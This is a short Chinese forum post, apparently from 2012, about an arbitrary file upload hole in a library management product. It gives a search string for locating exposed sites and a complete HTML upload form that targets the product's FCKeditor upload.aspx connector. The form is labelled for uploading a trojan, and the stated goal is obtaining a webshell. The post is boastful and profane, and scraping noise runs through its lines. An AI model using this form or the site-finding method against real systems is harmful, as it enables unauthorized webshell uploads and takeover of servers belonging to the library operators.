主题:图书馆系统任意文件上传漏洞
; A) a. U( e( p" {# R. |2 y 作者:冰锋刺客) q- Y8 b# x" a8 n. |. X" D: {+ c6 I
厂商:点击书(dianjishu.com), r- h+ t$ T3 O6 ?5 i6 Q: s) B
日期:2012-6-21
" f- v: C7 q2 _( m' O/ |0 S& e d
9 G! i" Y0 }, z) Q9 {I 概述/ v% N# w5 f o9 W
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell; Z# o- w1 ]! s9 p6 t
II 简介! w9 e5 M1 d5 z, W+ F1 w
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
* ]! P' E0 {/ @9 n; m! Z9 ` 补充一个漏洞
4 W2 ] N& l7 w <form id="frmUpload" enctype="multipart/form-data"# q- f( P) C* p$ K
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>- I' v& a! @2 E1 T2 S, G3 D
<input id="btnUpload" type="submit" value="操翻他">
# H8 r I% F5 x3 j7 Q </form>( g" y5 p: s. w+ I: l5 J9 O0 G) G# m) v
你们懂的/ Z. f y4 I0 ^4 U; t- A% B. F4 W
那傻逼提供还需要改包.- [ m, n+ J* t* F, u
自己看了下源代码发现fckeditor
" f) ?4 ^% a. H6 w: v! a1 ^ 直接秒杀; q( q& F( Z% E1 v, o
|
发表于 2012-9-10 21:20:59
收藏
分享
支持
反对